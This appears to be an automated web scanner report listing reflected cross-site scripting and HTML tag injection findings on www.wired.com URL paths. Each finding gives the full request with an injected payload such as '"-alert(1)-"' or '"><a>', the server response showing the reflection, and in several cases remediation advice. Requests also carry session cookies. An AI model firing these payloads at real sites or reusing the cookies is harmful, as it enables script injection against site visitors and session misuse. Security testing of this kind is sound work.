HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29274 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:49 GMT Date: Sun, 21 Nov 2010 23:09:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_space19e09"><a>ac805a603f2"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd674"><a>362856281e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /searchcd674"><a>362856281e6 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29325 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:13:49 GMT Date: Mon, 22 Nov 2010 01:09:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_searchcd674"><a>362856281e6"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2a40"><a>d195687ec69 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /servicesd2a40"><a>d195687ec69/corrections/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29357 Vary: Accept-Encoding Cache-Control: max-age=225 Expires: Mon, 22 Nov 2010 01:12:27 GMT Date: Mon, 22 Nov 2010 01:08:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_servicesd2a40"><a>d195687ec69 ss_corrections"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20746"><a>2a57fa204b8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /services/corrections20746"><a>2a57fa204b8/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29357 Vary: Accept-Encoding Expires: Mon, 22 Nov 2010 01:09:18 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 22 Nov 2010 01:09:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_services ss_corrections20746"><a>2a57fa204b8"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abe3c"><a>0650befcdcc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /servicesabe3c"><a>0650befcdcc/email/culture/art/multimedia/2008/07/gallery_faves_food HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29317 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 22:18:42 GMT Date: Sun, 21 Nov 2010 22:08:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_servicesabe3c"><a>0650befcdcc ss_email c_culture"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99c62"><a>f4dab07ffe9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /services/email99c62"><a>f4dab07ffe9/culture/art/multimedia/2008/07/gallery_faves_food HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29317 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 22:19:04 GMT Date: Sun, 21 Nov 2010 22:09:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_services ss_email99c62"><a>f4dab07ffe9 c_culture"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c7bc"-alert(1)-"baa07cebf20 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /services/email/culture8c7bc"-alert(1)-"baa07cebf20/art/multimedia/2008/07/gallery_faves_food HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Pragma: no-cache Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, no-store Expires: Sun, 21 Nov 2010 22:09:31 GMT Date: Sun, 21 Nov 2010 22:09:31 GMT Content-Length: 32230 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f88b"><a>d314e13f6a1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /services/email/culture4f88b"><a>d314e13f6a1/art/multimedia/2008/07/gallery_faves_food HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Pragma: no-cache Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, no-store Expires: Sun, 21 Nov 2010 22:09:24 GMT Date: Sun, 21 Nov 2010 22:09:24 GMT Content-Length: 32216 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml ...[SNIP]... <body class="s_services ss_email c_culture4f88b"><a>d314e13f6a1"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69f26"-alert(1)-"7b4c9190c10 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /services/email/culture/art69f26"-alert(1)-"7b4c9190c10/multimedia/2008/07/gallery_faves_food HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Pragma: no-cache Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, no-store Expires: Sun, 21 Nov 2010 22:09:32 GMT Date: Sun, 21 Nov 2010 22:09:32 GMT Content-Length: 32202 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fa5c"-alert(1)-"e70c417b07a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /services/email/culture/art/multimedia8fa5c"-alert(1)-"e70c417b07a/2008/07/gallery_faves_food HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Pragma: no-cache Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, no-store Expires: Sun, 21 Nov 2010 22:09:33 GMT Date: Sun, 21 Nov 2010 22:09:33 GMT Content-Length: 32202 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b056b"-alert(1)-"94be61696de was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /services/email/culture/art/multimedia/2008b056b"-alert(1)-"94be61696de/07/gallery_faves_food HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=UTF-8 Expires: Sun, 21 Nov 2010 22:09:34 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 21 Nov 2010 22:09:34 GMT Content-Length: 32202 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53a9b"-alert(1)-"71d40f0ea48 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /services/email/culture/art/multimedia/2008/0753a9b"-alert(1)-"71d40f0ea48/gallery_faves_food HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Pragma: no-cache Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, no-store Expires: Sun, 21 Nov 2010 22:09:35 GMT Date: Sun, 21 Nov 2010 22:09:35 GMT Content-Length: 32202 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 8 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a570b"-alert(1)-"e4737c8dafd was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /services/email/culture/art/multimedia/2008/07/gallery_faves_fooda570b"-alert(1)-"e4737c8dafd HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Pragma: no-cache Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, no-store Expires: Sun, 21 Nov 2010 22:09:36 GMT Date: Sun, 21 Nov 2010 22:09:36 GMT Content-Length: 32202 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bb7b"><a>7ab8294467e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /services3bb7b"><a>7ab8294467e/faq/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29341 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:12:53 GMT Date: Mon, 22 Nov 2010 01:08:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_services3bb7b"><a>7ab8294467e ss_faq"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a2bc"><a>d55232de10d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /services/faq1a2bc"><a>d55232de10d/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29341 Vary: Accept-Encoding Expires: Mon, 22 Nov 2010 01:09:28 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 22 Nov 2010 01:09:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_services ss_faq1a2bc"><a>d55232de10d"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6abf1"><a>5ce90c983a8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /services6abf1"><a>5ce90c983a8/feedback/general HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29368 Vary: Accept-Encoding Cache-Control: max-age=229 Expires: Mon, 22 Nov 2010 01:12:54 GMT Date: Mon, 22 Nov 2010 01:09:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_services6abf1"><a>5ce90c983a8 ss_feedback c_general"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 974da"><a>72d8e369572 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /services/feedback974da"><a>72d8e369572/general HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29368 Vary: Accept-Encoding Expires: Mon, 22 Nov 2010 01:09:32 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 22 Nov 2010 01:09:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_services ss_feedback974da"><a>72d8e369572 c_general"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 905fe"><a>4b273f842e2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /services/feedback/general905fe"><a>4b273f842e2 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29368 Vary: Accept-Encoding Expires: Mon, 22 Nov 2010 01:09:45 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 22 Nov 2010 01:09:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_services ss_feedback c_general905fe"><a>4b273f842e2"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7e6f"><a>b5e2078d190 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
